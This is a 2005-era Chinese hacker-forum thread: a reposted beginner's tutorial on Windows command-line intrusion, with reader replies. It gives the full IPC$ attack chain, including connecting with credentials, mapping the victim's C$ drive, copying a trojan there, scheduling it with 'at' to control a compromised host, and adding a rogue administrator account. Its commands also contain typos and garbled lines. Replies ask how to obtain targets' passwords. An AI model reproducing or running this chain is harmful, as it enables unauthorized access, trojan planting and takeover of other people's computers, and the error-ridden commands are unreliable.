[转载]菜鸟的重要阶段
[color=red]可恶的冰血转贴也不看清楚了,这么多错误,害的我一个一个改另外这种知识水平就写文章,容易害了人的,连内部命令外部命令他都不明白,就乱写。
已经更正大部分错误。
另外需要注意的是 像" 这类的标点符号 一定要用ascii中的英文半角符号,不要用GB2312中的全角符号。
另外 如果想详细了解关于telnet。请看这个
[url]http://www.eviloctal.com/forum/read.php?tid=7346&page=1&toread=1[/url]
关于ipc$入侵的详细资料看这个
[url]http://www.eviloctal.com/forum/read.php?fid=12&tid=781&toread=1[/url]
[/color]
信息来源:[url]www.hacker-cn.com[/url]
大家好 我是新来小编 同时和大家一样也是一个菜鸟 希望和大家能一起成长一起学习 下面呢我来介绍一下 安全知识入门学习
第一节
菜鸟必学的网络命令
要学习网络入侵,首先我们必须学习一些基础的网络命令,我们所谓的基础命令其实也就是WIN 2K,WIN XP系统下的一些DOS命令,这个命令都又CMD.exe来完成
概念部分:
(1)2000、XP下的CMD与98的MS-DOS的不同之处:
cmd.exe叫命令提示符他与98下的MS-DOS是不一样的,所以我们不能将他混为一谈,但是我们却可以用CMD.exe来执行很多DOS命令,例如:dir、cd、del等等!
(2)CMD下的内部命令与外部命令的不同:
CMD下的内部命令就是指:在任何情况下都可以运行的命令,在cmd执行是装入内存的。外部命令就是需要一个com或exe类型的程序支持,例如telnet,ftp,net都属于外部命令。实操部分:
(一):常用入侵防护命令:
Net 、telnet 、at、copy、ftp、finger、del~~~~~~
一些常用的Net命令与例子:
(1)建立IPC连接的命令
Net use \\IP\ipc$ "" /user:username
例如:
Net use \\127.0.0.1\ipc$ 123456 /user :administrator
这个命令的意思就是与用户名为adminidtrator用户密码为123456的主机127.0.0.1建立ipc$空连接
(2) 删除IPC$空连接
Net use \\ip /del
例如:
Net use \\127.0.0.1 /del
删除与主机127.0.0.1已经建立的Ipc$连接
(3) 启动关闭服务:
Net start //查看已经开启的服务
Net start servername
Net stop servername
例如:
Net start telnet //开启telnet服务
Net stop telnet //关闭telnet服务
(4)启动关闭共享
Net shate ipc$Content$nbsp; //开启ipc$默认共享
Net share ipc$ /del //关闭ipc$默认共享
Net share c=c:/ //完全共享c盘
Net share d=d:/ //删除完全共享的d盘
(4) 映射硬盘
Net use z: \\ip\c$
例如:
Net use z: \\127.0.0.1\c$ //把127.0.0.1的C盘映射成本机的z盘
说明:映射成功后,你在我的电脑里面里面就会多出一个硬盘Z,其实Z就是127.0.0.1的C盘!
Net use z: /del //断开映射
入侵中的作用:把对方的硬盘映射过来以后我们就能直接复制文件到对方的硬盘下面了
成功实现的条件:必须与对方建立ipc$连接
(5) 远程复制文件_Copy
Copy e:\3389.exe \\127.0.0.1\c$ //将本地的E盘下的3389.exe这个文件copy到对方系统的C盘根目录下
Copy在入侵中的作用:把本地文件复制到对方硬盘
Copy复制成功所需的条件:必须与主机建立ipc$连接
(6) 查看远程系统的时间
Net time \\IP
Net time \\127.0.0.1 //查看远程主机127.0.0.1的本地时间
作用:得到对方时间好为自己计划任务种下木马做准备
(7) 远程运行程序
At \\ip time server.exe
At \\127.0.0.1 12:30 c:/server.exe //让主机在中午12:30分运行我们已经复制到他C
盘根目录下的木马server.exe
在入侵中作用:这样我们就可以用我们的木马服务端来连接我们木马,,更好的使用图形方式来控制肉鸡
(8)添加管理员帐号:
Net user username 1234 /add //添加一个密码为1234名字为 username的用户
Net localgroup administrators juntuan /add //把username这个用户添加到管 理员组
注意:有些系统的管理员组不是administrators你要根据实际情况来改,不过99.9%的系统的管理员组还是administrators的。
修改用户密码:
Net user username 1234 //把用户username的密码修改成1233。
(9)远程登陆主机_telnet
telnet IP port
例如:telnet 127.0.0.1 1234 //连接登陆127.0.0.1的1234端口
(当目标主机的端口是默认的23的时候我们不需要+端口即:telnet IP 就好)
(10)传输文件命令_ftp
其实这个我个人觉得用途不大,毕竟当你拿到了FTP密码之后你可以用flashftp或者cutftp有一个图形截面的交互如何不好呢?
首先在CMD里面输入ftp
然后输入:open IP port
例如:open 127.0.0.1 1234 //连接登陆127.0.0.1的1234端口
如何开启windows系统自带的ftp服务:
Net start msftppsvc
(11) 查看文件夹的属性_cacls
Cacls xiaod //查看xiaod这个文件夹的属性
参数说明:F:(完全控制)R:(只读)C:(允许更改)W:(允许写入)N:(没有任何权限)
(12) 删除文件_del
Del是用来删除文件命令
首先进入你想删除的文件的目录
Del xiaod.txt //删除xiaod.txt这个个文件
Del xiaod.txt /f //强制删除xiaod.txt这个个文件(当该文件无法正常删除的时候使用该命令)
(13) finger命令
Finger是一个信息刺探命令一般在对方开启了79端口时命令使用
Finger –l user @computer
参数详解: -l 用长列表格式显示消息
User:指定用户的信息
成功实现的条件:对方必须安装tcp/ip协议
(14):文件写入命令_echo:
Echo 你好 > index.htm //用你好来覆盖index.htm的内容
Echo 你好 >>index.htm //将“你好”添加到index.htm
(15):导入注册表文件_regedit
Regedit /s filename.reg //s是导入参数
(16):端口映射_chgport
Chgport 3=5 //将端口3映射到5
Chgport /d* //删除所有端口映射
(17):文件映射_subst
Subst b:/ c:/winnt //这个时候当你访问硬盘B的时候你就是访问了 c:/winnt目录
(18):查看当前正在使用的帐号:
Query session //查看帐号
(19):踢掉指定用:
Logoff id //注意ID,是在用query session查看到的用户的id而不是用户名。
(20):发送消息给某用户或者内网主机
Net send {name | * | /DOMAIN[:name] | /USERS} message
例如:net send xiaod hello! 一次完整的IPC入侵所有命令集合.
想想现在的防火墙已经让这些命令一次性完全的操作成为
了过去.
怀念啊 [quote][b]下面是引用zhenzhen于06-04-2005 16:39发表的格式好像有问题:[/b]
上面的关于哪个空联接的///////
应该是net use \IP AdressIPC$ "password" /user:"username"
吧,你们说呢[/quote]
恩 \/反了 一直喜欢图形界面的(呵呵,windows会成功的部分原因)
渐渐的发现了入侵多数时候是要在shell里玩的。
在入侵中学会了net、netstat、ipconfig、copy、echo......
学会了shell里用tftp、ftp传文件,用echo写文本.......
入侵中不知不觉就学到了不少知识了~~~~
呵呵~~~~ 希望楼主能多发表些这样文章,能使我这样的菜鸟多学一点知识!Thank You ! 各们,偶刚刚出道,什么都不懂
能不能先教教我从哪开始呀???
看得我晕头转向的。。。 新人看这些东西都会头大的~慢慢就好了~
有时候我们可以借助一些黑软来辅助入侵 这个已经成了必修课了~
虽然已经掌握了,但还是温习一遍吧
我在实践中经常出现找不到共享目录的情况(已经连上去了) 楼主
(4)启动关闭共享
Net shate ipc$Content$nbsp; //开启ipc$默认共享
Net share ipc$ /del //关闭ipc$默认共享
Net share c=c:/ //完全共享c盘
Net share d=d:/ //删除完全共享的d盘
上面一个shate 写错了。应该是share
这里纠正下。 一次完整的IPC入侵所有命令集合.
想想现在的防火墙已经让这些命令一次性完全的操作成为
了过去.
怀念啊
确实啊,怀念啊。。 Net use //IP/ipc$ “” /user:username
我试了一下怎么不行啊?
还是同一个局域网的IP都不行,是不是要开了防火墙就不行啊?
还的。TELNET 命令也不行!是不是要别人的机子开了TELNET 服务才行?
呵呵!菜鸟! 我觉得最后一个发送消息不能成功.是不是楼主给出的命令有问题呢? [quote][b]下面是引用心情好于2005-12-09 21:46发表的:[/b]
Net use //IP/ipc$ “” /user:username
我试了一下怎么不行啊?
还是同一个局域网的IP都不行,是不是要开了防火墙就不行啊?
还的。TELNET 命令也不行!是不是要别人的机子开了TELNET 服务才行?
呵呵!菜鸟![/quote]
文章又错误,你用 net user \\IP\ipc$ "密码" /user:用户名 这样的格式连接
连不上的原因有很多,例如用户名错误,对方没有开默认共享等等。
另外需要注意的是 像" 这类的标点符号 一定要用ascii中的英文半角符号,不要用GB2312中的全角符号。
telnet是必须开telnet服务的。而你可以不开,但对方一定要开,否则是连不上的。 怎么知道对方的用户名和密码啊!!! [s:36] 第一句就不知道怎么做! 超菜鸟一个请求指点 是比较详细的了哦,算是复习了一次了。不过可能是键盘不好用有几个字母和符号错误 [quote][b]下面是引用snak707于2005-09-06 00:44发表的:[/b]
前面都知道,后面几个还没用过[/quote]
我也一样。。以前都不知道后面几个命令。 [s:39]
页:
[1]